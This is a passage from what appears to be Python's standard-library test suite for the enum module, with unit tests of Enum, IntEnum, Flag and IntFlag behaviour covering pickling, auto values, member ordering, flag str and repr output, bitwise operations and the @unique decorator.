__name__, int.__repr__(self)) def __str__(self): base = int base_str = base.__str__ if base_str.__objclass__ is object: return base.__repr__(self) return base_str(self) def __add__(self, other): temp = int(self) + int(other) if isinstance(self, NamedInt) and isinstance(other, NamedInt): return NamedInt('({0} + {1})'.format(self.__name__, other.__name__), temp) else: return temp class NEI(NamedInt, Enum): __qualname__ = 'NEI' x = 'the-x', 1 y = 'the-y', 2 def __reduce_ex__(self, proto): return getattr, (self.__class__, self._name_) self.assertIs(NEI.__new__, Enum.__new__) self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)") globals()['NamedInt'] = NamedInt globals()['NEI'] = NEI NI5 = NamedInt('test', 5) self.assertEqual(NI5, 5) self.assertEqual(NEI.y.value, 2) test_pickle_dump_load(self.assertIs, NEI.y) test_pickle_dump_load(self.assertIs, NEI) def test_tuple_subclass(self): class SomeTuple(tuple, Enum): __qualname__ = 'SomeTuple' first = 1, 'for the money' second = 2, 'for the show' third = 3, 'for the music' self.assertIs(type(SomeTuple.first), SomeTuple) self.assertIsInstance(SomeTuple.second, tuple) self.assertEqual(SomeTuple.third, (3, 'for the music')) globals()['SomeTuple'] = SomeTuple test_pickle_dump_load(self.assertIs, SomeTuple.first) def test_duplicate_values_give_unique_enum_items(self): class AutoNumber(Enum): first = () second = () third = () def __new__(cls): value = len(cls.__members__) + 1 obj = object.__new__(cls) obj._value_ = value return obj def __int__(self): return int(self._value_) self.assertEqual(list(AutoNumber), [AutoNumber.first, AutoNumber. 
second, AutoNumber.third]) self.assertEqual(int(AutoNumber.second), 2) self.assertEqual(AutoNumber.third.value, 3) self.assertIs(AutoNumber(1), AutoNumber.first) def test_inherited_new_from_enhanced_enum(self): class AutoNumber(Enum): def __new__(cls): value = len(cls.__members__) + 1 obj = object.__new__(cls) obj._value_ = value return obj def __int__(self): return int(self._value_) class Color(AutoNumber): red = () green = () blue = () self.assertEqual(list(Color), [Color.red, Color.green, Color.blue]) self.assertEqual(list(map(int, Color)), [1, 2, 3]) def test_inherited_new_from_mixed_enum(self): class AutoNumber(IntEnum): def __new__(cls): value = len(cls.__members__) + 1 obj = int.__new__(cls, value) obj._value_ = value return obj class Color(AutoNumber): red = () green = () blue = () self.assertEqual(list(Color), [Color.red, Color.green, Color.blue]) self.assertEqual(list(map(int, Color)), [1, 2, 3]) def test_equality(self): class AlwaysEqual: def __eq__(self, other): return True class OrdinaryEnum(Enum): a = 1 self.assertEqual(AlwaysEqual(), OrdinaryEnum.a) self.assertEqual(OrdinaryEnum.a, AlwaysEqual()) def test_ordered_mixin(self): class OrderedEnum(Enum): def __ge__(self, other): if self.__class__ is other.__class__: return self._value_ >= other._value_ return NotImplemented def __gt__(self, other): if self.__class__ is other.__class__: return self._value_ > other._value_ return NotImplemented def __le__(self, other): if self.__class__ is other.__class__: return self._value_ <= other._value_ return NotImplemented def __lt__(self, other): if self.__class__ is other.__class__: return self._value_ < other._value_ return NotImplemented class Grade(OrderedEnum): A = 5 B = 4 C = 3 D = 2 F = 1 self.assertGreater(Grade.A, Grade.B) self.assertLessEqual(Grade.F, Grade.C) self.assertLess(Grade.D, Grade.A) self.assertGreaterEqual(Grade.B, Grade.B) self.assertEqual(Grade.B, Grade.B) self.assertNotEqual(Grade.C, Grade.D) def test_extending2(self): class Shade(Enum): 
def shade(self): print(self.name) class Color(Shade): red = 1 green = 2 blue = 3 with self.assertRaises(TypeError): class MoreColor(Color): cyan = 4 magenta = 5 yellow = 6 def test_extending3(self): class Shade(Enum): def shade(self): return self.name class Color(Shade): def hex(self): return '%s hexlified!' % self.value class MoreColor(Color): cyan = 4 magenta = 5 yellow = 6 self.assertEqual(MoreColor.magenta.hex(), '5 hexlified!') def test_no_duplicates(self): class UniqueEnum(Enum): def __init__(self, *args): cls = self.__class__ if any(self.value == e.value for e in cls): a = self.name e = cls(self.value).name raise ValueError( 'aliases not allowed in UniqueEnum: %r --> %r' % ( a, e)) class Color(UniqueEnum): red = 1 green = 2 blue = 3 with self.assertRaises(ValueError): class Color(UniqueEnum): red = 1 green = 2 blue = 3 grene = 2 def test_init(self): class Planet(Enum): MERCURY = 3.303e+23, 2439700.0 VENUS = 4.869e+24, 6051800.0 EARTH = 5.976e+24, 6378140.0 MARS = 6.421e+23, 3397200.0 JUPITER = 1.9e+27, 71492000.0 SATURN = 5.688e+26, 60268000.0 URANUS = 8.686e+25, 25559000.0 NEPTUNE = 1.024e+26, 24746000.0 def __init__(self, mass, radius): self.mass = mass self.radius = radius @property def surface_gravity(self): G = 6.673e-11 return G * self.mass / (self.radius * self.radius) self.assertEqual(round(Planet.EARTH.surface_gravity, 2), 9.8) self.assertEqual(Planet.EARTH.value, (5.976e+24, 6378140.0)) def test_nonhash_value(self): class AutoNumberInAList(Enum): def __new__(cls): value = [len(cls.__members__) + 1] obj = object.__new__(cls) obj._value_ = value return obj class ColorInAList(AutoNumberInAList): red = () green = () blue = () self.assertEqual(list(ColorInAList), [ColorInAList.red, ColorInAList.green, ColorInAList.blue]) for enum, value in zip(ColorInAList, range(3)): value += 1 self.assertEqual(enum.value, [value]) self.assertIs(ColorInAList([value]), enum) def test_conflicting_types_resolved_in_new(self): class LabelledIntEnum(int, Enum): def 
__new__(cls, *args): value, label = args obj = int.__new__(cls, value) obj.label = label obj._value_ = value return obj class LabelledList(LabelledIntEnum): unprocessed = 1, 'Unprocessed' payment_complete = 2, 'Payment Complete' self.assertEqual(list(LabelledList), [LabelledList.unprocessed, LabelledList.payment_complete]) self.assertEqual(LabelledList.unprocessed, 1) self.assertEqual(LabelledList(1), LabelledList.unprocessed) def test_auto_number(self): class Color(Enum): red = auto() blue = auto() green = auto() self.assertEqual(list(Color), [Color.red, Color.blue, Color.green]) self.assertEqual(Color.red.value, 1) self.assertEqual(Color.blue.value, 2) self.assertEqual(Color.green.value, 3) def test_auto_name(self): class Color(Enum): def _generate_next_value_(name, start, count, last): return name red = auto() blue = auto() green = auto() self.assertEqual(list(Color), [Color.red, Color.blue, Color.green]) self.assertEqual(Color.red.value, 'red') self.assertEqual(Color.blue.value, 'blue') self.assertEqual(Color.green.value, 'green') def test_auto_name_inherit(self): class AutoNameEnum(Enum): def _generate_next_value_(name, start, count, last): return name class Color(AutoNameEnum): red = auto() blue = auto() green = auto() self.assertEqual(list(Color), [Color.red, Color.blue, Color.green]) self.assertEqual(Color.red.value, 'red') self.assertEqual(Color.blue.value, 'blue') self.assertEqual(Color.green.value, 'green') def test_auto_garbage(self): class Color(Enum): red = 'red' blue = auto() self.assertEqual(Color.blue.value, 1) def test_auto_garbage_corrected(self): class Color(Enum): red = 'red' blue = 2 green = auto() self.assertEqual(list(Color), [Color.red, Color.blue, Color.green]) self.assertEqual(Color.red.value, 'red') self.assertEqual(Color.blue.value, 2) self.assertEqual(Color.green.value, 3) def test_duplicate_auto(self): class Dupes(Enum): first = primero = auto() second = auto() third = auto() self.assertEqual([Dupes.first, Dupes.second, Dupes.third], 
list(Dupes)) class TestOrder(unittest.TestCase): def test_same_members(self): class Color(Enum): _order_ = 'red green blue' red = 1 green = 2 blue = 3 def test_same_members_with_aliases(self): class Color(Enum): _order_ = 'red green blue' red = 1 green = 2 blue = 3 verde = green def test_same_members_wrong_order(self): with self.assertRaisesRegex(TypeError, 'member order does not match _order_'): class Color(Enum): _order_ = 'red green blue' red = 1 blue = 3 green = 2 def test_order_has_extra_members(self): with self.assertRaisesRegex(TypeError, 'member order does not match _order_'): class Color(Enum): _order_ = 'red green blue purple' red = 1 green = 2 blue = 3 def test_order_has_extra_members_with_aliases(self): with self.assertRaisesRegex(TypeError, 'member order does not match _order_'): class Color(Enum): _order_ = 'red green blue purple' red = 1 green = 2 blue = 3 verde = green def test_enum_has_extra_members(self): with self.assertRaisesRegex(TypeError, 'member order does not match _order_'): class Color(Enum): _order_ = 'red green blue' red = 1 green = 2 blue = 3 purple = 4 def test_enum_has_extra_members_with_aliases(self): with self.assertRaisesRegex(TypeError, 'member order does not match _order_'): class Color(Enum): _order_ = 'red green blue' red = 1 green = 2 blue = 3 purple = 4 verde = green class TestFlag(unittest.TestCase): """Tests of the Flags.""" class Perm(Flag): R, W, X = 4, 2, 1 class Open(Flag): RO = 0 WO = 1 RW = 2 AC = 3 CE = 1 << 19 def test_str(self): Perm = self.Perm self.assertEqual(str(Perm.R), 'Perm.R') self.assertEqual(str(Perm.W), 'Perm.W') self.assertEqual(str(Perm.X), 'Perm.X') self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W') self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X') self.assertEqual(str(Perm(0)), 'Perm.0') self.assertEqual(str(~Perm.R), 'Perm.W|X') self.assertEqual(str(~Perm.W), 'Perm.R|X') self.assertEqual(str(~Perm.X), 'Perm.R|W') self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X') 
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.0') self.assertEqual(str(Perm(~0)), 'Perm.R|W|X') Open = self.Open self.assertEqual(str(Open.RO), 'Open.RO') self.assertEqual(str(Open.WO), 'Open.WO') self.assertEqual(str(Open.AC), 'Open.AC') self.assertEqual(str(Open.RO | Open.CE), 'Open.CE') self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO') self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO') self.assertEqual(str(~Open.WO), 'Open.CE|RW') self.assertEqual(str(~Open.AC), 'Open.CE') self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC') self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW') def test_repr(self): Perm = self.Perm self.assertEqual(repr(Perm.R), '<Perm.R: 4>') self.assertEqual(repr(Perm.W), '<Perm.W: 2>') self.assertEqual(repr(Perm.X), '<Perm.X: 1>') self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>') self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>') self.assertEqual(repr(Perm(0)), '<Perm.0: 0>') self.assertEqual(repr(~Perm.R), '<Perm.W|X: 3>') self.assertEqual(repr(~Perm.W), '<Perm.R|X: 5>') self.assertEqual(repr(~Perm.X), '<Perm.R|W: 6>') self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: 1>') self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.0: 0>') self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: 7>') Open = self.Open self.assertEqual(repr(Open.RO), '<Open.RO: 0>') self.assertEqual(repr(Open.WO), '<Open.WO: 1>') self.assertEqual(repr(Open.AC), '<Open.AC: 3>') self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>') self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>') self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: 524291>') self.assertEqual(repr(~Open.WO), '<Open.CE|RW: 524290>') self.assertEqual(repr(~Open.AC), '<Open.CE: 524288>') self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC: 3>') self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: 2>') def test_or(self): Perm = self.Perm for i in Perm: for j in Perm: self.assertEqual(i | j, Perm(i.value | j.value)) 
self.assertEqual((i | j).value, i.value | j.value) self.assertIs(type(i | j), Perm) for i in Perm: self.assertIs(i | i, i) Open = self.Open self.assertIs(Open.RO | Open.CE, Open.CE) def test_and(self): Perm = self.Perm RW = Perm.R | Perm.W RX = Perm.R | Perm.X WX = Perm.W | Perm.X RWX = Perm.R | Perm.W | Perm.X values = list(Perm) + [RW, RX, WX, RWX, Perm(0)] for i in values: for j in values: self.assertEqual((i & j).value, i.value & j.value) self.assertIs(type(i & j), Perm) for i in Perm: self.assertIs(i & i, i) self.assertIs(i & RWX, i) self.assertIs(RWX & i, i) Open = self.Open self.assertIs(Open.RO & Open.CE, Open.RO) def test_xor(self): Perm = self.Perm for i in Perm: for j in Perm: self.assertEqual((i ^ j).value, i.value ^ j.value) self.assertIs(type(i ^ j), Perm) for i in Perm: self.assertIs(i ^ Perm(0), i) self.assertIs(Perm(0) ^ i, i) Open = self.Open self.assertIs(Open.RO ^ Open.CE, Open.CE) self.assertIs(Open.CE ^ Open.CE, Open.RO) def test_invert(self): Perm = self.Perm RW = Perm.R | Perm.W RX = Perm.R | Perm.X WX = Perm.W | Perm.X RWX = Perm.R | Perm.W | Perm.X values = list(Perm) + [RW, RX, WX, RWX, Perm(0)] for i in values: self.assertIs(type(~i), Perm) self.assertEqual(~~i, i) for i in Perm: self.assertIs(~~i, i) Open = self.Open self.assertIs(Open.WO & ~Open.WO, Open.RO) self.assertIs((Open.WO | Open.CE) & ~Open.WO, Open.CE) def test_bool(self): Perm = self.Perm for f in Perm: self.assertTrue(f) Open = self.Open for f in Open: self.assertEqual(bool(f.value), bool(f)) def test_programatic_function_string(self): Perm = Flag('Perm', 'R W X') lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1 << i e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_string_with_start(self): Perm = 
Flag('Perm', 'R W X', start=8) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 8 << i e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_string_list(self): Perm = Flag('Perm', ['R', 'W', 'X']) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1 << i e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_iterable(self): Perm = Flag('Perm', (('R', 2), ('W', 8), ('X', 32))) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1 << 2 * i + 1 e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_from_dict(self): Perm = Flag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32)))) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1 << 2 * i + 1 e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_pickle(self): if isinstance(FlagStooges, Exception): raise FlagStooges test_pickle_dump_load(self.assertIs, FlagStooges.CURLY | FlagStooges.MOE) test_pickle_dump_load(self.assertIs, FlagStooges) def test_containment(self): Perm = self.Perm R, W, X = 
Perm RW = R | W RX = R | X WX = W | X RWX = R | W | X self.assertTrue(R in RW) self.assertTrue(R in RX) self.assertTrue(R in RWX) self.assertTrue(W in RW) self.assertTrue(W in WX) self.assertTrue(W in RWX) self.assertTrue(X in RX) self.assertTrue(X in WX) self.assertTrue(X in RWX) self.assertFalse(R in WX) self.assertFalse(W in RX) self.assertFalse(X in RW) def test_auto_number(self): class Color(Flag): red = auto() blue = auto() green = auto() self.assertEqual(list(Color), [Color.red, Color.blue, Color.green]) self.assertEqual(Color.red.value, 1) self.assertEqual(Color.blue.value, 2) self.assertEqual(Color.green.value, 4) def test_auto_number_garbage(self): with self.assertRaisesRegex(TypeError, 'Invalid Flag value: .not an int.'): class Color(Flag): red = 'not an int' blue = auto() def test_cascading_failure(self): class Bizarre(Flag): c = 3 d = 4 f = 6 self.assertRaisesRegex(ValueError, '5 is not a valid Bizarre', Bizarre, 5) self.assertRaisesRegex(ValueError, '5 is not a valid Bizarre', Bizarre, 5) self.assertRaisesRegex(ValueError, '2 is not a valid Bizarre', Bizarre, 2) self.assertRaisesRegex(ValueError, '2 is not a valid Bizarre', Bizarre, 2) self.assertRaisesRegex(ValueError, '1 is not a valid Bizarre', Bizarre, 1) self.assertRaisesRegex(ValueError, '1 is not a valid Bizarre', Bizarre, 1) def test_duplicate_auto(self): class Dupes(Enum): first = primero = auto() second = auto() third = auto() self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes)) def test_bizarre(self): class Bizarre(Flag): b = 3 c = 4 d = 6 self.assertEqual(repr(Bizarre(7)), '<Bizarre.d|c|b: 7>') @unittest.skipUnless(threading, 'Threading required for this test.') @support.reap_threads def test_unique_composite(self): class TestFlag(Flag): one = auto() two = auto() three = auto() four = auto() five = auto() six = auto() seven = auto() eight = auto() def __eq__(self, other): return self is other def __hash__(self): return hash(self._value_) seen = set() failed = False def 
cycle_enum(): nonlocal failed try: for i in range(256): seen.add(TestFlag(i)) except Exception: failed = True threads = [threading.Thread(target=cycle_enum) for _ in range(8)] with support.start_threads(threads): pass self.assertFalse(failed, 'at least one thread failed while creating composite members') self.assertEqual(256, len(seen), 'too many composite members created') class TestIntFlag(unittest.TestCase): """Tests of the IntFlags.""" class Perm(IntFlag): X = 1 << 0 W = 1 << 1 R = 1 << 2 class Open(IntFlag): RO = 0 WO = 1 RW = 2 AC = 3 CE = 1 << 19 def test_type(self): Perm = self.Perm Open = self.Open for f in Perm: self.assertTrue(isinstance(f, Perm)) self.assertEqual(f, f.value) self.assertTrue(isinstance(Perm.W | Perm.X, Perm)) self.assertEqual(Perm.W | Perm.X, 3) for f in Open: self.assertTrue(isinstance(f, Open)) self.assertEqual(f, f.value) self.assertTrue(isinstance(Open.WO | Open.RW, Open)) self.assertEqual(Open.WO | Open.RW, 3) def test_str(self): Perm = self.Perm self.assertEqual(str(Perm.R), 'Perm.R') self.assertEqual(str(Perm.W), 'Perm.W') self.assertEqual(str(Perm.X), 'Perm.X') self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W') self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X') self.assertEqual(str(Perm.R | 8), 'Perm.8|R') self.assertEqual(str(Perm(0)), 'Perm.0') self.assertEqual(str(Perm(8)), 'Perm.8') self.assertEqual(str(~Perm.R), 'Perm.W|X') self.assertEqual(str(~Perm.W), 'Perm.R|X') self.assertEqual(str(~Perm.X), 'Perm.R|W') self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X') self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.-8') self.assertEqual(str(~(Perm.R | 8)), 'Perm.W|X') self.assertEqual(str(Perm(~0)), 'Perm.R|W|X') self.assertEqual(str(Perm(~8)), 'Perm.R|W|X') Open = self.Open self.assertEqual(str(Open.RO), 'Open.RO') self.assertEqual(str(Open.WO), 'Open.WO') self.assertEqual(str(Open.AC), 'Open.AC') self.assertEqual(str(Open.RO | Open.CE), 'Open.CE') self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO') 
self.assertEqual(str(Open(4)), 'Open.4') self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO') self.assertEqual(str(~Open.WO), 'Open.CE|RW') self.assertEqual(str(~Open.AC), 'Open.CE') self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC|RW|WO') self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW') self.assertEqual(str(Open(~4)), 'Open.CE|AC|RW|WO') def test_repr(self): Perm = self.Perm self.assertEqual(repr(Perm.R), '<Perm.R: 4>') self.assertEqual(repr(Perm.W), '<Perm.W: 2>') self.assertEqual(repr(Perm.X), '<Perm.X: 1>') self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>') self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>') self.assertEqual(repr(Perm.R | 8), '<Perm.8|R: 12>') self.assertEqual(repr(Perm(0)), '<Perm.0: 0>') self.assertEqual(repr(Perm(8)), '<Perm.8: 8>') self.assertEqual(repr(~Perm.R), '<Perm.W|X: -5>') self.assertEqual(repr(~Perm.W), '<Perm.R|X: -3>') self.assertEqual(repr(~Perm.X), '<Perm.R|W: -2>') self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: -7>') self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.-8: -8>') self.assertEqual(repr(~(Perm.R | 8)), '<Perm.W|X: -13>') self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: -1>') self.assertEqual(repr(Perm(~8)), '<Perm.R|W|X: -9>') Open = self.Open self.assertEqual(repr(Open.RO), '<Open.RO: 0>') self.assertEqual(repr(Open.WO), '<Open.WO: 1>') self.assertEqual(repr(Open.AC), '<Open.AC: 3>') self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>') self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>') self.assertEqual(repr(Open(4)), '<Open.4: 4>') self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: -1>') self.assertEqual(repr(~Open.WO), '<Open.CE|RW: -2>') self.assertEqual(repr(~Open.AC), '<Open.CE: -4>') self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC|RW|WO: -524289>' ) self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: -524290>') self.assertEqual(repr(Open(~4)), '<Open.CE|AC|RW|WO: -5>') def test_or(self): Perm = self.Perm for i in Perm: for j in 
Perm: self.assertEqual(i | j, i.value | j.value) self.assertEqual((i | j).value, i.value | j.value) self.assertIs(type(i | j), Perm) for j in range(8): self.assertEqual(i | j, i.value | j) self.assertEqual((i | j).value, i.value | j) self.assertIs(type(i | j), Perm) self.assertEqual(j | i, j | i.value) self.assertEqual((j | i).value, j | i.value) self.assertIs(type(j | i), Perm) for i in Perm: self.assertIs(i | i, i) self.assertIs(i | 0, i) self.assertIs(0 | i, i) Open = self.Open self.assertIs(Open.RO | Open.CE, Open.CE) def test_and(self): Perm = self.Perm RW = Perm.R | Perm.W RX = Perm.R | Perm.X WX = Perm.W | Perm.X RWX = Perm.R | Perm.W | Perm.X values = list(Perm) + [RW, RX, WX, RWX, Perm(0)] for i in values: for j in values: self.assertEqual(i & j, i.value & j.value, 'i is %r, j is %r' % (i, j)) self.assertEqual((i & j).value, i.value & j.value, 'i is %r, j is %r' % (i, j)) self.assertIs(type(i & j), Perm, 'i is %r, j is %r' % (i, j)) for j in range(8): self.assertEqual(i & j, i.value & j) self.assertEqual((i & j).value, i.value & j) self.assertIs(type(i & j), Perm) self.assertEqual(j & i, j & i.value) self.assertEqual((j & i).value, j & i.value) self.assertIs(type(j & i), Perm) for i in Perm: self.assertIs(i & i, i) self.assertIs(i & 7, i) self.assertIs(7 & i, i) Open = self.Open self.assertIs(Open.RO & Open.CE, Open.RO) def test_xor(self): Perm = self.Perm for i in Perm: for j in Perm: self.assertEqual(i ^ j, i.value ^ j.value) self.assertEqual((i ^ j).value, i.value ^ j.value) self.assertIs(type(i ^ j), Perm) for j in range(8): self.assertEqual(i ^ j, i.value ^ j) self.assertEqual((i ^ j).value, i.value ^ j) self.assertIs(type(i ^ j), Perm) self.assertEqual(j ^ i, j ^ i.value) self.assertEqual((j ^ i).value, j ^ i.value) self.assertIs(type(j ^ i), Perm) for i in Perm: self.assertIs(i ^ 0, i) self.assertIs(0 ^ i, i) Open = self.Open self.assertIs(Open.RO ^ Open.CE, Open.CE) self.assertIs(Open.CE ^ Open.CE, Open.RO) def test_invert(self): Perm = self.Perm 
RW = Perm.R | Perm.W RX = Perm.R | Perm.X WX = Perm.W | Perm.X RWX = Perm.R | Perm.W | Perm.X values = list(Perm) + [RW, RX, WX, RWX, Perm(0)] for i in values: self.assertEqual(~i, ~i.value) self.assertEqual((~i).value, ~i.value) self.assertIs(type(~i), Perm) self.assertEqual(~~i, i) for i in Perm: self.assertIs(~~i, i) Open = self.Open self.assertIs(Open.WO & ~Open.WO, Open.RO) self.assertIs((Open.WO | Open.CE) & ~Open.WO, Open.CE) def test_programatic_function_string(self): Perm = IntFlag('Perm', 'R W X') lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1 << i e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e, v) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_string_with_start(self): Perm = IntFlag('Perm', 'R W X', start=8) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 8 << i e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e, v) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_string_list(self): Perm = IntFlag('Perm', ['R', 'W', 'X']) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1 << i e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e, v) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_iterable(self): Perm = IntFlag('Perm', (('R', 2), ('W', 8), ('X', 32))) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 
3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1 << 2 * i + 1 e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e, v) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_from_dict(self): Perm = IntFlag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32)))) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1 << 2 * i + 1 e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e, v) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_containment(self): Perm = self.Perm R, W, X = Perm RW = R | W RX = R | X WX = W | X RWX = R | W | X self.assertTrue(R in RW) self.assertTrue(R in RX) self.assertTrue(R in RWX) self.assertTrue(W in RW) self.assertTrue(W in WX) self.assertTrue(W in RWX) self.assertTrue(X in RX) self.assertTrue(X in WX) self.assertTrue(X in RWX) self.assertFalse(R in WX) self.assertFalse(W in RX) self.assertFalse(X in RW) def test_bool(self): Perm = self.Perm for f in Perm: self.assertTrue(f) Open = self.Open for f in Open: self.assertEqual(bool(f.value), bool(f)) @unittest.skipUnless(threading, 'Threading required for this test.') @support.reap_threads def test_unique_composite(self): class TestFlag(IntFlag): one = auto() two = auto() three = auto() four = auto() five = auto() six = auto() seven = auto() eight = auto() def __eq__(self, other): return self is other def __hash__(self): return hash(self._value_) seen = set() failed = False def cycle_enum(): nonlocal failed try: for i in range(256): seen.add(TestFlag(i)) except Exception: failed = True threads = [threading.Thread(target=cycle_enum) for _ in range(8)] with support.start_threads(threads): pass self.assertFalse(failed, 'at least one 
thread failed while creating composite members') self.assertEqual(256, len(seen), 'too many composite members created') class TestUnique(unittest.TestCase): def test_unique_clean(self): @unique class Clean(Enum): one = 1 two = 'dos' tres = 4.0 @unique class Cleaner(IntEnum): single = 1 double = 2 triple = 3 def test_unique_dirty(self): with self.assertRaisesRegex(ValueError, 'tres.*one'): @unique class Dirty(Enum): one = 1 two = 'dos' tres = 1 with self.assertRaisesRegex(ValueError, 'double.*single.*turkey.*triple'): @unique class Dirtier(IntEnum): single = 1 double = 1 triple = 3 turkey = 3 def test_unique_with_name(self): @unique class Silly(Enum): one = 1 two = 'dos' name = 3 @unique class Sillier(IntEnum): single = 1 name = 2 triple = 3 value = 4 expected_help_output_with_docs = """Help on class Color in module %s: class Color(enum.Enum) | An enumeration. | | Method resolution order: | Color | enum.Enum | builtins.object | | Data and other attributes defined here: | | blue = <Color.blue: 3> | | green = <Color.green: 2> | | red = <Color.red: 1> | | ---------------------------------------------------------------------- | Data descriptors inherited from enum.Enum: | | name | The name of the Enum member. | | value | The value of the Enum member. | | ---------------------------------------------------------------------- | Data descriptors inherited from enum.EnumMeta: | | __members__ | Returns a mapping of member name->value. | | This mapping lists all enum members, including aliases. 
